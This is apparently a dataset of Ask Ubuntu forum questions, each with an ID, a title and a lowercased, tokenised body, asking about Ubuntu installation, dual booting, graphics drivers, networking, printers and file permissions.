421331	how to rename /dev/sdax ( partitions ) in linux	i made a partition like /part on my machine with some important data ... but i ca n't stand the name of it ... i want a clear solution to resolve it and change the name of it to for example /test ... as you see this is my /etc/fstab information : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda5 during installation uuid=a21a99c4-e5b4-4197-ac5e-80d0fab1f30c / ext4 errors=remount-ro 0 1 # /home was on /dev/sda6 during installation uuid=2e37d833-ca34-4fa7-a5d8-a4423a5af9bc /home ext4 defaults 0 2 # /part was on /dev/sda7 during installation uuid=47e6e0b1-0e57-4184-a378-375b9ce315c5 /part ext4 defaults 0 2 # swap was on /dev/sda1 during installation uuid=485e9f78-4dce-4404-af4e-f43985525264 none swap sw 0 0 the point is : my information are important and i scare to manipulate it without being sure ... i want a safe solution ... how is it possible ? thank you in advance
421338	nvidia 740m and ubuntu 13.10	my laptop ( asus x550lb ) has a nvidia 740m . i have tried installing bumblebee but every time i check `` about this computer '' in the graphics part it says intel haswell mobile . does that mean that i 'm not using my graphics card ? how can i make it work ? thanks in advance
421339	libjpeg-turbo unrecognized option	i 'm trying to compile libjpeg-turbo with hardware acceleration enabled . whenever i run this ../configure cppflags=â-o3 -pipe -fpic -mfpu=neon -mfloat-abi=hardâ it says configure : error : unrecognized option : -pipe if i remove pipe , it says -fpic is unrecognized and so on . what am i doing wrong ?
421340	close skype port	i do n't trust skype but as most of my friends use it i 'm stuck with it . i read on some posts that skype does n't require an opened listening port in order to function properly . when i do sudo netstat -tulpn while skype is on i get tcp 0 0 0.0.0.0:16464 0.0.0.0 : * listen 4874/skype that is by the way the only listening port opened as i closed other things like samba and cups which i do n't need . so my question is how can i close this port and will skype still be able to work if i close it ?
421341	ubuntu wo n't install - stopped on preparing to install	i downloaded ubuntu 12.04 lts and when i run the installation i choose language and connect it to my wifi on the upper panel . after that all requirements are ticked and as i click continue it stops doing anything . it only disconnects me from the wifi and unticks is connected to the internet box . i ca n't access additional drivers ... i had ubuntu 13.10 but due to some graphics drivers issues i deleted that partition from windows .
421343	high xorg processor usage when scrolling or moveing windows after upgrading to 13.10	after upgrading to the version 13.10 in xubuntu , scrolling and moving windows becomes jagged and slow . when i look at system monitor i see that cpu usage rises for xorg , but only when i scroll , or move a window .
421346	ubuntu 13.10 ca n't connect to internet after static ip attempt	i recently posted about obtaining a static ip in ubuntu , someone solved it for me , but when i check the dchp client list in the gateway , i noticed it was n't the ip i assigned , when i rebooted my system , it no longer would connect to the internet . i believe before i modified it , the interface had `` lo '' instead of `` eth0 '' when i tried to revert it to whatever it was before ( i was n't sure what it said , i think it was longer than 4 digits and a d was the first letter . i want my static ip to be 192.168.2.21 , gateway to be 192.168.2.1 , and mask to be 255.255.255.0 , ( the public ca n't access stuff without these numbers , i think they need to connect to the public ip first , but i 'm not gon na explain that . )
421347	is there a way to purchase +100 gb on ubuntu one ?	i need +100 gb cloud storage . so far , google drive and dropbox give me good options , but i want a third option . if i purchase the +100 gb , would i be able to access it from my multiple devices ?
421348	i have problem while opening terminal	when i am trying to open terminal , it show me error like this `` there was an error creating the child process for this terminal . getpt failed : no such file or directory . '' with two buttons 1. profile preference 2. relaunch
421351	running ubuntu even with xp installed	i am brand new to using this type of an os . i currently am running xp , and am wondering when i boot my pc , do i have the option of choosing to run ubuntu instead of xp ? further , with xp being fazed in favor of windows 8 , how will ubuntu hold up in terms of anti-virus protection ? i am aware that with xp being fazed out , security updates will no longer be available .
421353	instaling/updating kernel on uefi device	i 've installed kernel 3.12.6 in ubuntu 13.10 , because i had read it is necessary for nvidia optimus . after i rebooted my laptop and selected ubuntu in grub purple screen appeared . i rebooted again and this time i chose kernel manually and it wrote : loading linux 3.12.6-031206-generic ... loading initial ramdisk ... and nothing else happened . is it some kind of uefi problem or am i wrong ?
421355	how to solve -f : command not found	i 'm trying to check some files existence using -f command followed by the file bath but i have an error . this is my script : initucounter= '' /home/teeba/users_counter_initial_value '' initpcounter= '' /home/teeba/number_of_processes '' if [ ! -f $ initucounter & & ! -f $ initpcounter ] then echo `` 0 '' > /tmp/users_counter_initial_value echo `` 1 '' > /tmp/processes_counter_initial_value fi
421357	ubuntu 13.10 does not remember desktop background picture	i have been using ubuntu 13.10 for around 1 month and i have n't been able to make ubuntu remember the configuration for my desktop background picture . once i restart the system it goes back to the default background and the picture i chose simply disappears from the pictures ' list in the configuration . actually , it 's not the first issue with ubuntu remembering configurations i 've come across . applications ' sounds settings has the same problem , such as skype . have n't found any solution to that yet , nor anyone with the same problem .
421359	unmet dependencies when installing libgtk2.0-dev	i am using ubuntu 12.10 . i am trying to install libgtk2.0-dev , but i am getting the following error message : the following packages have unmet dependencies . libgtk2.0-dev : depends : libgtk2.0-0 ( = 2.24.13-0ubuntu2 ) but 2.24.17-0ubuntu1~12.10~ricotz0 is to be installed depends : libglib2.0-dev ( > = 2.27.3 ) but it is not going to be installed depends : libgdk-pixbuf2.0-dev ( > = 2.21.0 ) but it is not going to be installed depends : libpango1.0-dev ( > = 1.20 ) but it is not going to be installed depends : libatk1.0-dev ( > = 1.29.2 ) but it is not going to be installed depends : libcairo2-dev ( > = 1.6.4-6.1 ) but it is not going to be installed recommends : debhelper but it is not going to be installed i have tried using sudo apt-get -f install as i 've seen in other similar questions but it did n't work . i do n't have a lot of experience with ubuntu/linux , so could you please explain what i should do ?
421360	trouble installing ubuntu on macbook pro 5,3	i ca n't seem to properly install ubuntu on my older macbook pro 15 '' as a singleboot and , when i load the grub in refind and press on either try or install i get a blackscreen that does n't go anywhere and the usb drive seems to stop flashing . i thought the issue might be as a result of having two gfx cards which may confuse the computer in picking the wrong one . what seems to work is when i make sure my discrete gpu is n't activated on the osx side then put : outb 0x728 1 outb 0x710 2 outb 0x740 2 outb 0x750 0 into grub then i can use the try ubuntu . though i 'm scared that this is only a small fix since i have to put the code in the grub everytime . should i continue with my install or is there something i must do before i start ?
421362	boot manager fails to start	i 'm dual booting ubuntu from a laptop that originally had windows 8 . having installed ubuntu using wubi i now get this error when i try to boot ubuntu : windows failed to start . file : \ubuntu\winboot\wubildr.mbr status : 0xc000007b info : app/os could n't be loaded due to missing file . how do i go about fixing this ?
421364	ubuntu 12.04.4 64bit and nvidia optimus hdmi on dell n5110	i did a clean install of ubuntu 12.04.4 64 bit . external display is working through hdmi which is wired to optimus nvidia graphic card . but the rendering is not good enough . there is a delay . i am getting trails while moving the cursor around or windows or anything . currently nouvea driver is in use for nvidia . what should i do to get this working properly ? install nvidia proprietary driver or bumblebee or both ? or something else ? : ~ $ lshw -c video warning : you should run this program as super-user . *-display description : vga compatible controller product : gf108m [ geforce gt 525m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : f5000000-f5ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport : e000 ( size=128 ) memory : f6000000-f607ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:57 memory : f6400000-f67fffff memory : d0000000-dfffffff ioport : f000 ( size=64 ) warning : output may be incomplete or inaccurate , you should run this program as super-user . : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 32767 x 32767 lvds1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) vga-2 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi-1 connected ( normal left inverted right x axis y axis ) 1920x1080 60.0 + 50.0 59.9 1920x1080i 60.1 50.0 60.0 1680x1050 59.9 1280x1024 60.0 1280x960 60.0 1152x864 60.0 1280x720 60.0 50.0 59.9 1024x768 60.0 800x600 60.3 720x576 50.0 720x480 60.0 59.9 640x480 60.0 59.9 1024x768 ( 0x44 ) 65.0mhz h : width 1024 start 1048 end 1184 total 1344 skew 0 clock 48.4khz v : height 768 start 771 end 777 total 806 clock 60.0hz 800x600 ( 0x45 ) 40.0mhz h : width 800 start 840 end 968 total 1056 skew 0 clock 37.9khz v : height 600 start 601 end 605 total 628 clock 60.3hz 800x600 ( 0x46 ) 36.0mhz h : width 800 start 824 end 896 total 1024 skew 0 clock 35.2khz v : height 600 start 601 end 603 total 625 clock 56.2hz 640x480 ( 0x5a ) 25.2mhz h : width 640 start 656 end 752 total 800 skew 0 clock 31.5khz v : height 480 start 490 end 492 total 525 clock 59.9hz
421366	i cant boot from usb	when i try to boot from my 8gb usb drive i open the boot menu and select my usb but after that is comes up with an error message saying that the operating system was not found and just stops . this happens every time i try and i have even tried putting it back on again using universal usb installer but it is sill the same when i boot . can anyone help ?
421367	wifi unstable on ubuntu 12.04	does anybody has any solution of unstable wifi in almost all the laptops , where it dips after every 15 mins . i want to use wireless on n channel . i am new to ubuntu .
421368	ubuntu 12.04 : changing hotkey for âactivitiesâ	i want to customize the hotkey for the activities-overlay in gnome shell in ubuntu 12.04 . i tried to edit both : /apps/metacity/global_keybindings/panel_main_menu /apps/mutter/general/overlay_key with gconf but unfortunetaly it did not work . my goal was to set alt + space as the new hotkey because i have some other os 's were alt+space has some similar functionality . any ideas ?
421371	how to search entire hard drive from a live usb ?	i just installed ubuntu 13.10 via `` universal usb installer '' on a usb stick . when i boot into ubuntu os/gui off the usb i ca n't seem to be able to search for files/folders on my hard drives . meaning , when i input any search criteria in as shown here : http : //askubuntu.com/a/91044/248351 i get no results . i 'm pretty sure that 's an easy answer , but any help would be greatly appreciated .
421373	commonbackend : the md5 of the metalink does match	i am new in linux and i am trying to install ubuntu 12 . 04 on my pc . after downloading and `` burning '' it on usb i try to install it . but there seems to be an error on the installation . `` could not retrieve the required installation files '' . it also tells me to check another file . this file writes something like this : error commonbackend : the md5 of the metalink does match error commonbackend : can not authenticate the metalink file , it might be corrupt after that there is also another error which says : error commonbackend : invalid md5 for iso c : \ubuntu\install\installation.iso ( 14ad92270218a8925d802b3d3b6e140f ! = 6c086700fd56a27a09b5de552ae054fd ) any here ? what seems to be the problem ?
421381	ubuntu 12.04.4 after login : freeze , then no networking ( wired/wireless ) , no external drives . need help	i 'm not very experienced with ubuntu and my sister 's desktop is malfunctioning . it might have been due to a recent update , but she ca n't tell . the system is 12.04 lts . symptoms : after login , it looks like the system is frozen - for a couple of minutes neither the mouse , nor the keyboard work . but after a couple of minutes , it all comes back to life and i can login . once i 'm in , though , the networking is not working ( nothing on the top menu bar ) and the attached usb-drives are not shown either . if i try to get into the networking part of the settings , it says something like `` these parameters are n't supported with this release '' ( ca n't tell you the exact wording , it 's in russian ) and shows nothing . i was able to boot from a 12.04 liveusb and both the networking and the drives were working well . please , help me troubleshoot this ( i 'd love to get more intimate with ubuntu in the process ) . thank you .
421383	adding unity-dock shortcuts at static place	i would like to add a shortcut in my unity dock ( the left panel ) , but right on top of the trash icon , in the `` static '' zone of the dock . a picture is worth a thousand words : can you help me achieve that ? thank you !
421384	how to test translations in the ubuntu-docs package ?	how can i test translations in the ubuntu-docs package ( ubuntu 13.10 ) ? instructions shown here are already outdated .
421388	asus zenbook ux32vd - ubuntu install tips	i had some problems with windows boot manager on my asus zenbook ux32vd and i 'm really considering kicking windows away and embrace ubuntu . but , prior to going to it , i would like to know : wich version is the best choice between 12.04 lts and 13.10 , now available ? the asus suport offers no drivers to linux ubuntu . will the windows 7 64 bits work ? wich graphic software works fine on ubuntu ? i use photoshop , ilustrator and indesign on windows os , and i know there 's the free choices gimp , inkscape and scribus . do you guys know if they work good ( and if there 's other choices ) on ubuntu ? thanks for your time , i 'm new on linux / ubuntu , and i 'd like some ideas before spending time on it .
421389	where to unpack the android studio file ?	i am new to ubuntu , i have just installed dual boot ubuntu 12.04 . i want to install android studio , but i do n't really know how . i have downloaded the android-studio-bundle.tgz file and in the it is written to unpack the file in the appropriate location . i do n't really know what appropriate location for my applications means . can you please tell me where to unpack this file , or if this is the correct way of installing android studio ? also if you comment me a good guide or place to read about tips on ubuntu i would be very grateful , just to have general understanding of ubuntu . main question : where should i unpack my android-studio-bundle.tgz file ?
421390	getting epson workforce 435 to work in ubuntu 12.04	i have been trying to get my epson workforce 435 all in one wireless printer/scanner to work in ubuntu 12.04 and no luck . for now , my os is running within an oracle virtual box vm . i have downloaded the following driver packages from epson : epson-inkjet-printer-201109w_1.0.0-1lsb3.2_i386.deb epson-inkjet-printer-escpr_1.3.1-1lsb3.2_i386.deb i installed both of them . i then used the printers menu item to install setup the printer . all goes well . but , when i print a test page the status message in the document status dialog box says : held for authentication when i was adding the printer , i was prompted to enter my login and password . i do n't understand .
421391	ubuntu 12.04 64-bit ; strange boot results	i recently installed ubuntu 64-bit on a new hard drive by first creating a fat 32 partition for the uefi boot partition to be installed on , and then running the install via an ubuntu bootable jump drive . it all seemed to go ok except when booting i see an error message flash across the top of the screen saying something about no bootable disk error followed by some graphical nonsense after which the ubuntu logo appears and it starts normally . should i worry about instability in the os because of the weird start-up or is this no cause for concern ? should i have installed a different way that creating a fat 32 partition first ?
421394	when i press home folder launcher on unity dash it starts loading some time	i have a little problem with unity dash . when i press on home folder button after opening home folder mouse pointer shows loading for some time . i have reseted unity dash once , it not helped . please take a look at screen capture http : //www.boxca.com/hr1mq6nsx4el/loading.webm.html
421397	canon printer driver mg5420	i went to link that was provided by cochisebt : search for drivers , manuals and firmware for pixma mg5440 downloaded this file mcp6-mac-mg5400-10_84_2_0-ea13 into my download folder . i have ubuntu 13.10 os , now how do i get it installed from this location ? new at this .
421398	transfer of photos from ubuntuone to my computer	how do i get photos from ubuntuone storage to my computer ?
421403	dual booting linux with windows using plop	i want to dual bot any linux with my windows xp in an old pc . my problem was that my bios do n't support usb booting . and ca n't burn a dvd ( dvd-rw not available ) . the only way i found was to boot with usb but as said earlier . i was searching for alternative ways to install a new os . then i found plop manager . i want to ask that can i dual bot through usb [ linux ( ubuntu or anyother ) with windows ] using plop manager ... or plop manager is only used to install a new os and do n't provide dual booting . please tell , and if any good tutorial ( video tutorial ) available , please share the link or send me in pm ; ) thanks
421406	how to stop unlock login keyring ?	every time i open web browser and application anoying dialog box comes say about unlock login keyring and there is always option for password.i do n't know the password to unlock i tried my system password also but i did n't work how can i disable it without effecting my computer . this is the dialog box of password and keys http : //i.imgur.com/bajy168.png
421407	dual boot android 4.3 and ubuntu touch on samsung galaxy note 2	is it possible to dual boot android and ubuntu touch on a samsung galaxy note 2 ?
421409	eclipse installation directory	i want to install the latest eclipse kepler java ee manually . so far so good . my questions : there are obviously 2 possible install directories for the extracted eclipse folder : /opt or /usr/local what is the recommended one ? the same but for creating a symbolic link : two possibilities to /usr/bin or /usr/local/bin same here what is the recommended directory ? my best bet : install directory /opt/eclipse and symbolic link to /usr/bin ?
421411	is an ordinary cd ( like for music downloads ) ok for downloading ubuntu or do i need a dvd disc ?	i have music cds , but not dvd discs . can i use one of these cds for downloading and installing ubuntu ?
421412	how does the default virtual host of apache works ?	i am using ubuntu 13.10 . i just made a fresh install of apache web server , and when i visit http : //localhost i see the default `` it works ! '' page . but when i browse the folder /etc/apache2/sites-enabled i see it is empty . if there is no symbolic link to sites-available/000-default.conf , how come the virtual host is actually working ?
421415	disable menu key	i want to disable `` menu '' key that emulates right click . it is unfortunately placed on my keyboard and i keep hitting it by mistake instead of altgr . this is the key i am talking about . is it possible to just permanently disable it ? either make it working as altgr , or just disable it outright .
421419	why does macbook freeze on disk unlock screen ?	i just installed ubuntu 13.10 on a macbook5,5 ( macbook pro 2009 ) . when the system boots , i get an `` unlocking the disk '' message ( http : //www.linuxlog.org/wp-content/uploads/2011/01/ubuntu-desktop- @ -2011-01-11-165718.png ) . there , i can not enter any text . the screen seems to be freezed . since i am totally new to ubuntu , does anyone know , what could be the reason for this ? is it necessary to install any drivers manually ? kind regards , benedikt
421420	how to backup and restore a full encrypted system	i have installed ubuntu 13.10 with full disk encryption on a dell xps 12 , overwriting the original windows 8 os . in order to update the firmware and apply a hardware fix ( to eliminate a screen ghosting issue ) , dell support wants me to reinstall windows 8 ( apparently the software to update the firmware and fix the screen requires windows to run ) . before wiping my hard drive and reinstalling windows , i would like to create an image of my current ubuntu system so i can later restore it . i 've seen various tutorials , but none specifically dealing with an ubuntu installation with full disk encryption on a uefi system . in the ubuntu `` disks '' tool , i notice that when clicking on a partition , there is a `` more actions '' menu that includes `` create disk image '' and `` restore disk image '' options . here is a screenshot : i 'm wondering if i can use this option to create and store a system image in this case . if so , should i image the luks partition or the lvm partition ? do i also need to image the other two partitions ( /boot/efi and /boot ) ? after imaging , how would i go about restoring the system back to its original state ? do i reinstall ubuntu and then restore the partition ( s ) from within ubuntu ? are there better options , such as clonezilla or dd ?
421421	how can i make a terminal with 3 tabs appear after startup ?	xubuntu 13.10 i would like to have xfce4-terminal appear automatically after logging in . i would like to have this instance of the terminal have 3 tabs , the first one being title htop , the second one titled man and the last one titled stuff . example : is that possible ?
421422	desktop wallpaper is upside down in lubuntu	having used ubuntu for over 3 years , i switched to lubuntu today . i downloaded a photo from gmail inbox and it saved in the downloads folder . when i set it as wallpaper it appears upside down . i have tried it with a couple of other photos but no change . the standard lubuntu ones are fine . has anyone got any ideas as there seems to be no option to change it ? many thanks , ian .
421423	is there another volume control sliding bar for xfce ?	i 'm on xubuntu 13.10 64 bit . i 've recently had this issue . as a result the sliding bar that is used to control the volume is gone . i can live without it , i can control the volume from my keyboard but i 'd like to know if i can install an alternative to the default sliding bar . i have xfce4 version 4.10 . my volume indicator looks like this , i do n't know what it 's called , but it 's the default one
421425	can not access lan in chroot	i have a ubuntu 12.04 x32 running in a chroot environment ( using crouton ) on my chromebook . it runs perfectly , and can access the internet . however , it can not access computers on the local network ( it wo n't discover minecraft lan devices , but others can discover and not connect to mine ) , and it wo n't discover or connect to any lan devices in nautilus ( error message when opening `` windows network '' saying `` unable to mount location '' and `` failed to retrieve share list from server '' ) . here is my /etc/hosts file , as default when installed : 127.0.0.1 localhost : :1 localhost ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters can someone please help me with this ? i need to access samba shares ( raspberry pi nas and my desktop computer file shares ) , and minecraft lan would be a bonus : )
421426	opening folder within a url	i am new to ubuntu server , so learning as i go along . i have followed a tutorial for setting up ubuntu server and everything for getting my server running with apache2 and ispconfig . my main site runs fine , but i use a folder for when i am messing around with web pages scripts . i used to host on windows and i did n't have to change anything : it displayed the content of the folder when typed in the url-bar , but this is not working on this setup . i have another folder with an index file in it , and this runs ok , so i put an index file in the folder i am having trouble with , and it opened that without any trouble . my guess is that there is probably something simple to change in apache settings so it can read a directory and not looking for an index file ... but i 'm not sure how to do that . can someone help please ? i hope that all this makes sense .
421434	create a sort of snapchat	maybe what i 'm trying to do is not really legal but it 's for my boyfriend , i just would like to send him pictures in the snapchat way . it means that i would impose a picture on his screen for a while without message to open before and without closing/deleting any work he could be doing . we both have ubuntu and i do n't know other places to get answers so if you also have ideas for my research , i take every kind of help ... feel free to improve my request : )
421435	how can i force wubi to use files from usb ?	i have a windows 8 machine , i understand that installing ubuntu inside windows 8 is not supported but i followed this guide to install the windows 7 bootloader . i can successfully boot into windows 8 but when i run wubi.exe from my usb it still did n't give me the option to install ubuntu inside windows . the work around that i found for this was to use g : \wubi.exe -- force-wubi it then gave me the install inside windows option but when i install it starts to do its thing but when it finishes extracting the files , it says that it starts downloading the .iso image again which already extracted to the usb . my main thing is that i do n't want to download it again because i already have it downloaded . any workarounds for this ?
421436	how to properly install avogadro 1.1.1	i would like to install avogadro 1.1.1 on my ubuntu 13.04 system . normally , i would have gone to the ubuntu software center or synaptic package manager to install the `` approved '' version of this molecular modeling program . however , the newer version seems to have fixed some bugs in version 1.0.3 . i have a dell inspiron 910 - one of their netbooks - and i have recently downloaded saucy salamander ( ubuntu 13.04 ) . i have the tar file that i downloaded from the avogadro website . i am not a linux expert , and would dearly love a series of steps ( including the proper directories ) so that i can properly compile and install this software package so that it works in ubuntu 13.04 . thank you for any assistance you may be able to provide .
421437	copy from guest ubuntu terminal in virual machine to microsoft word on host windows	is it possible to copy from the ubuntu terminal to microsoft word ? in fact , microsoft word is installed on my computer while i am running ubuntu on a virtual machine .
421439	bluetooth does not work with my acer aspire v5 573g	i just have installed ubuntu 13.10 on my acer aspire v5 573g . the bluetooth was working fine with my speaker during one day but it stopped suddenly . the speaker is working with another device so it is clearly my laptop that do not handle bluetooth anymore . i have installed blueman which can detect my speaker but can not connect it . i have tried : sudo rfkill unblock all sudo hciconfig hci0 up it does not help . the result of sudo rfkill list is : 0 : hci0 : bluetooth soft blocked : no hard blocked : no 3 : acer-bluetooth : bluetooth soft blocked : no hard blocked : no i have no idea what to do next . any suggestion ? edit : i have set enable=socket in /etc/bluetooth/audio.conf and now the device connect ! but it is not recognized by pulseaudio , so i can not redirect sound to the speaker . here is the syslog when the speaker connects : feb 16 20:21:08 mamachine pulseaudio [ 5121 ] : [ pulseaudio ] module-bluetooth-device.c : 00:0c:8a : a3:5e:34 is not known . feb 16 20:21:08 mamachine pulseaudio [ 5121 ] : [ pulseaudio ] module.c : failed to load module `` module-bluetooth-device '' ( argument : `` address=00:0c:8a : a3:5e:34 profile=a2dp '' ) : initialization failed . how can i make my device recognized pulseaudio ? upgrade bluez ? ( i dont know how to do that ) .
421442	ubuntu webdesign workflow	i will switch from windows workflow to linux workflow but first i need some advice . so let 's go . best way to compail sass with compas ( without terminal , some gui ? ) best tools for vectors on ubuntu/linux is inkscape right ? i need localserver for testing etc , is there any gui control for that ? like xampp ? i know there is xampp for linux but is there alternative for that ? is there anything like this for linux ? http : //anvilformac.com/ i need to open xara files . is it possible somehow ? i try to install xara on ubuntu but it fail . program never open and i see that is to everyone . is it possible to open it with gimp ? or some other way ? is there any tutorial ( i look but never finde ) for better overheat ( i have lot of problems with that ) . i have intel and amd graphich card and all the time my vent is very loud i use bitbucket for git , is there any good gui for that ?
421445	how to get the cpu utlization percentage for each user in ubuntu by a command	i 've typed this command to get the memory usage for each user : ps aux | awk 'nr > 2 { arr [ $ 1 ] += $ 6 } end { for ( i in arr ) print i , arr [ i ] } ' i want to know if there is a command or a way to get the cpu usage or in other words `` cpu utilization percentage '' for each user like the above command which its output :
421452	lubuntu ati driver ?	i wanted to know what driver version of ati/amd for sapphire hd 4650 1 gb agp 8x , on lubuntu 13.10 ? i did n't find any good for it with display or something . i have sapphire hd 4650 1024 mb agp 8x processor sempron 3300+ ram : 1 gb ( 2x 512 mb ddr1 )
421453	uc-logic tablet	i want to use my uc logic wp8060 tablet on linux . i downloaded and installed wizard-pen driver . when i do a lsusb , it does show with the right model . when i move the pen , nothing happens . and i have new battery in it
421454	new windows open below visible one	every time a new window is opened , gnome likes to force it below the current one so i have to go to the taskbar and restore it . i can tolerate a lot of stuff but i open new windows way too often ( because i 'm very wasteful with my screen real estate ) . checked the tweak tool for possible settings that could be related , only one seemed like it would : whether raising should be a side-effect of other user actions on or off , same result . ca n't pinpoint anything in dconf or gconf but theres so much in there i might have missed it . and ca n't think of what i might have changed to result in such an awful torture . alt-tab puts it in the very next slot which helps , but i do n't always realize a new window is being made ( like google hangouts clicking screen share ) ubuntu 13.10 x64 gnome 3.8.4 using gdm
421456	how to uninstall ubuntu 12.10	i need to uninstall ubuntu but i cant find how to for my situation . i have ubuntu and windows xp both installed on my computer . however , the windows xp came preinstalled so i dont have the cd . i do not have a dvd/cd drive on my computer ( i installed ubuntu via usb ) . is there any way i could uninstall ubuntu while keeping xp installed .
421458	how can kbarcode included back into repository ?	how can kbarcode be included back in to the ubuntu repositories ? where can i suggest that this be included back ? yesterday i compiled kbarcode for kde4 from source to suit u12.04.4lts . which turned out to be a relatively straight forward and painless process . the remarkable thing is kbarcode worked first go ! 1 ) set up git for src code , which is here kbarcode-git repository 2 ) figure out cmake , ( man cmake and simple cmake howto ) 3 ) use apt-file to find packages for missing libraries 4 ) install missing kde4 libraries 5 ) compile with cmake 6 ) use checkinstall to make a debian package and install on system now i have a freshly brewed kbarcode-kde4_20140215-1_amd64.deb for my u12.04.4lts boxen , sweeeet !
421461	i lost some files	recently i installed ubuntu 12.04 lts alongside with windows 8 and my hardisk got a three partitions one for windows another one for ubuntu and the last is ntfs partiotion .. i copied data to the ntfs partition from my ubuntu after a while i logged in windows 8 and copied another file to the same partition .. i came back to linux but i found that all the previous data i copied to the ntfs partiotion did n't exist i tried unhide the files but did n't pay off , , i also tried to list the files from the terminal inorder to find them but i did n't find them althought the disk appears full and did n't have a space what i have to do to regain my files and thank you : )
421462	shutdown and restart problem in ubuntu 13.10 - problema en apagado y reinicio en ubuntu 13.10	after installing updates and making changes to ubuntu - when i shutdown or restart - when i am turning off the system it stays there loading and does not completely shut down . so what i do is forcibly shut with the button on the pc . what do you need to help solve this ? how do i fix it ? original question in spanish : después de estar instalando actualizaciones y haciendo cambios en ubuntu a la hora de apagarlo o reiniciarlo cuando se esta apagando se queda ahí cargando y no se termina de apagar . entonces o que hago es apagarlo forzadamente con el boton de la pc . ¿a que se puede deber esto ? ¿como lo soluciono ?
421463	ca n't install ubuntu server 12.04 or the 13.10	my problem is when i tried to install ubuntu , a message said wrong disc found . also it said that there is a cd , but not for the installation . it appeared at the point of installation , in there it detected and wanted to install the rom drive . how can i install the server version ? system configuration amd a4 4000 apu mushkin chronos mknssdcr60gb sata3 samsung dvd rewriter sata connected asrock fm2a55m-vg3 geil 4gb ram update ubuntu 11.x is installed with password and internet connection . mabo has a password , too , to get in the uefi . the pc is from last year , did n't know any kind of production numbers or anything else , like that . another question , is there a user interface in ubuntu server , like in windows or ubuntu , or is it just like the terminal ?
421464	hdfc bank net banking page not accessible	whenever i try to open the website www.hdfcbank.com , the website opens . then i check the netbanking box and press the login tab below . a new window opens up as it is supposed to , but in the new window , there is an option which says continue to netbanking . when this is pressed , my browser should direct me to a page which asks for my customer id , but nothing happens . it seems as if the tab is unresponsive . i tried it on firefox as well as chromium , but the results are the same . i 'm guessing it 's got something to do with some package on ubuntu . kindly help . btw , i 'm using saucy 13.10 . additionally , if i am trying to make a transaction online via hdfc bank netbanking , then the merchant site should directly link to my customer id page and in that case the merchant site returns an error saying that the website is down or the page is unavailable . please help .
421465	how to give different groups different permissions on a specific folder ?	i have two groups `` group1 '' and `` group2 '' i have also folder `` folder '' i want to give group1 read and write permission , while group2 only read . any suggestion ?
421466	why ca n't ubuntu recognize my parititions ?	i am trying to install ubuntu 13.10 as a dual-boot with windows 8.1 on a toshiba satellite p55-a5200 . i downloaded it and installed the boot-helper , because my startup showed no menus . it then showed a choice between windows 8.1 and ubuntu on startup , so i chose to try out ubuntu then install . in trying to install ubuntu , it can not find any other os even though i have turned off safe boot in windows . the computer recognizes that the partitions are there , but ubuntu does not . the same happened with 12.04 .
421467	vm loading windows 8.1 dual-boot partition	i just decided to try out ubuntu ( i 'm new to linux , so bear with me please ) . i had windows 8 installed and want/need to keep it . is it possible to load my windows 8 partition in a virtualbox , or any other vm software ? or does it have to be created as a vm only ? i do n't really need/want another installation of windows at the moment , but i 'd like to be able to use it from ubuntu from time to time . ubuntu version is 12.04 lts
421470	gnome/nvidia overwriting .nvidia-settings.rc	i 'm seeing a lot of people having issues of when changing brightness/contrast/gamma through nvidia settings and the settings not loading the next time they log in . i am also having this problem . i have a feeling the file is being read because for a split second after logging in , before the shell has loaded , the settings are applied , then the settings are reverted and the shell finishes loading . then like , everybody else having trouble getting the settings to stick , i open the gui or stick the commands in terminal and the settings are applied no probs . card : nvidia 9600 gs driver : 331.20 distro : ubuntu 12.04 gnome shell : 3.4.1 what i 've tried : opening nvidia-settings as root and user saving .nvidia-settings.rc in root and user folder in case of conflicts changing the startup application from -- load-config-only to -l adding another startup application at the end of the list ( including hidden items ) removing the hostname from the file adding a 0 : before the the settings deleting and regenerating file deleting and regenerating xorg.conf moving .nvidia-settings.rc to /etc/x11/ . here is my .nvidia-settings.rc ... . rcfilelocale = c tooltips = yes displaystatusbar = yes slidertextentries = yes includedisplaynameinconfigfile = no showquitdialog = yes updaterulesonprofilenamechange = yes timer = memory_used_ ( gpu_0 ) , yes,3000 timer = thermal_monitor_ ( gpu_0 ) , yes,1000 timer = powermizer_monitor_ ( gpu_0 ) , yes,1000 # attributes : 0/synctovblank=1 0/loganiso=0 0/fsaa=0 0/texturesharpen=0 0/textureclamping=1 0/fxaa=0 0/allowflipping=1 0/fsaaappcontrolled=1 0/loganisoappcontrolled=1 0/openglimagesettings=1 0/fsaaappenhanced=0 0/xvideosynctodisplayid=dvi-i-0 [ dpy : dvi-i-0 ] /dithering=0 [ dpy : dvi-i-0 ] /ditheringmode=0 [ dpy : dvi-i-0 ] /ditheringdepth=0 [ dpy : dvi-i-0 ] /synchronouspaletteupdates=0 [ dpy : vga-0 ] /redbrightness=-0.767654 [ dpy : vga-0 ] /greenbrightness=-0.767654 [ dpy : vga-0 ] /bluebrightness=-0.767654 [ dpy : vga-0 ] /redcontrast=0.034169 [ dpy : vga-0 ] /greencontrast=0.034169 [ dpy : vga-0 ] /bluecontrast=0.034169 [ dpy : vga-0 ] /redgamma=1.633485 [ dpy : vga-0 ] /greengamma=1.633485 [ dpy : vga-0 ] 